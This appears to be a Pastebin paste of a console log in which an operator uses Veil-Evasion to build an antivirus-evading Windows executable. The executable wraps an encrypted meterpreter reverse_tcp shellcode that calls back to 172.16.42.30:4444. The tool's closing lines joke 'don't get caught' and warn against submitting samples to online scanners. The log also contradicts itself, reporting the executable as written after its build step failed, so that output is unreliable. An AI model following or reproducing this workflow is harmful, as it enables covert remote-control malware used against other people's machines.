Advertisement
Guest User

Untitled

a guest
Jul 7th, 2015
304
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.10 KB | None | 0 0
  1. =========================================================================
  2. Veil-Evasion | [Version]: 2.20
  3. =========================================================================
  4. [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
  5. =========================================================================
  6.  
  7. Payload: python/shellcode_inject/aes_encrypt loaded
  8.  
  9.  
  10. Required Options:
  11.  
  12. Name Current Value Description
  13. ---- ------------- -----------
  14. compile_to_exe Y Compile to an executable
  15. expire_payload X Optional: Payloads expire after "X" days
  16. inject_method Virtual Virtual, Void, Heap
  17. use_pyherion N Use the pyherion encrypter
  18.  
  19. Available commands:
  20.  
  21. set set a specific option value
  22. info show information about the payload
  23. generate generate payload
  24. back go to the main menu
  25. exit exit Veil
  26.  
  27. [>] Please enter a command: set use_pyherion Y
  28. [>] Please enter a command: generate
  29.  
  30. =========================================================================
  31. Veil-Evasion | [Version]: 2.20
  32. =========================================================================
  33. [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
  34. =========================================================================
  35.  
  36. [?] Use msfvenom or supply custom shellcode?
  37.  
  38. 1 - msfvenom (default)
  39. 2 - custom shellcode string
  40. 3 - file with shellcode (raw)
  41.  
  42. [>] Please enter the number of your choice: 1
  43.  
  44. [*] Press [enter] for windows/meterpreter/reverse_tcp
  45. [*] Press [tab] to list available payloads
  46. [>] Please enter metasploit payload:
  47. [>] Enter value for 'LHOST', [tab] for local IP: 172.16.42.30
  48. [>] Enter value for 'LPORT': 4444
  49. [>] Enter extra msfvenom options in -OPTION=value or syntax:
  50.  
  51. [*] Generating shellcode...
  52. No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  53. No Arch selected, selecting Arch: x86 from the payload
  54. Found 10 compatible encoders
  55. Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
  56. x86/shikata_ga_nai succeeded with size 326 (iteration=0)
  57. x86/shikata_ga_nai chosen with final size 326
  58. Payload size: 326 bytes
  59.  
  60. =========================================================================
  61. Veil-Evasion | [Version]: 2.20
  62. =========================================================================
  63. [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
  64. =========================================================================
  65.  
  66. [*] Press [enter] for 'payload'
  67. [>] Please enter the base name for output files: payload3
  68.  
  69. [?] How would you like to create your payload executable?
  70.  
  71. 1 - Pyinstaller (default)
  72. 2 - Pwnstaller (obfuscated Pyinstaller loader)
  73. 3 - Py2Exe
  74.  
  75. [>] Please enter the number of your choice: 1
  76. err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
  77. err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
  78. err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
  79. err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
  80. err:module:import_dll Library pywintypes27.dll (which is needed by L"C:\\Python27\\lib\\site-packages\\win32\\win32api.pyd") not found
  81. Error: PyInstaller for Python 2.6+ on Windows needs pywin32.
  82. Please install from http://sourceforge.net/projects/pywin32/
  83. fixme:msvcr90:__clean_type_info_names_internal (0x8c4460) stub
  84. fixme:msvcr90:__clean_type_info_names_internal (0x44ba30) stub
  85. fixme:msvcr90:__clean_type_info_names_internal (0x100554f0) stub
  86. fixme:msvcr90:__clean_type_info_names_internal (0x1d1b5210) stub
  87. fixme:msvcr90:__clean_type_info_names_internal (0x1e24c178) stub
  88. mv: cannot stat `dist/payload3.exe': No such file or directory
  89. rm: cannot remove `*.spec': No such file or directory
  90. rm: cannot remove `logdict*.*': No such file or directory
  91.  
  92. =========================================================================
  93. Veil-Evasion | [Version]: 2.20
  94. =========================================================================
  95. [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
  96. =========================================================================
  97.  
  98.  
  99. [*] Executable written to: /usr/share/veil-output/compiled/payload3.exe
  100.  
  101. Language: python
  102. Payload: python/shellcode_inject/aes_encrypt
  103. Shellcode: windows/meterpreter/reverse_tcp
  104. Options: LHOST=172.16.42.30 LPORT=4444
  105. Required Options: compile_to_exe=Y expire_payload=X
  106. inject_method=Virtual use_pyherion=Y
  107. Payload File: /usr/share/veil-output/source/payload3.py
  108. Handler File: /usr/share/veil-output/handlers/payload3_handler.rc
  109.  
  110.  
  111.  
  112. [!] Please run ./config/update.py !
  113. [*] Your payload files have been generated, don't get caught!
  114. [!] And don't submit samples to any online scanner! ;)
  115.  
  116. [>] press any key to return to the main menu:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement